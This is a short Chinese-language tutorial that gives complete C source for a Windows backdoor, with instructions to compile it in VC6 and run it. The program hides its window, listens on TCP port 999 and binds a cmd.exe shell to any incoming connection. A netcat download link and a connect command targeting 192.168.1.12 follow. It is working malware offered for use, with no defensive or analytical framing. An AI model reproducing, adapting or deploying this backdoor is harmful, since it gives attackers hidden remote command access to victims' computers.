1.首先使用vc6编译器编译后门,并运行
#pragma comment(lib,"ws2_32.lib") #ifdef _MSC_VER #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) #endif #include <winsock2.h> #include <windows.h> #define Port 999 int main() { SOCKET sSocket,cSocket; STARTUPINFO si; PROCESS_INFORMATION pi; WSADATA wsaData; sockaddr_in sSockaddr; char szCmdPath[MAX_PATH]; GetEnvironmentVariable("COMSPEC",szCmdPath,MAX_PATH); ZeroMemory(&wsaData,sizeof(wsaData)); ZeroMemory(&si,sizeof(STARTUPINFO)); ZeroMemory(&pi,sizeof(PROCESS_INFORMATION)); WSAStartup(0x0202,&wsaData); cSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0); sSockaddr.sin_addr.s_addr=INADDR_ANY; sSockaddr.sin_family=AF_INET; sSockaddr.sin_port=htons(Port); bind(cSocket,(sockaddr*)&sSockaddr,sizeof(sSockaddr)); listen(cSocket,1); int sLen=sizeof(sSockaddr); sSocket=accept(cSocket,(sockaddr*)&sSockaddr,&sLen); si.cb=sizeof(si); si.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW; si.hStdInput=(HANDLE)sSocket; si.hStdOutput=(HANDLE)sSocket; si.hStdError=(HANDLE)sSocket; CreateProcess(NULL,szCmdPath,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi); WaitForSingleObject(pi.hProcess,INFINITE); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); closesocket(cSocket); closesocket(sSocket); WSACleanup(); return 0; }
2.连接时使用nc工具链接即可
下载地址:https://eternallybored.org/misc/netcat/
nc执行命令 nc64.exe -t 192.168.1.12 999 即可链接到主机
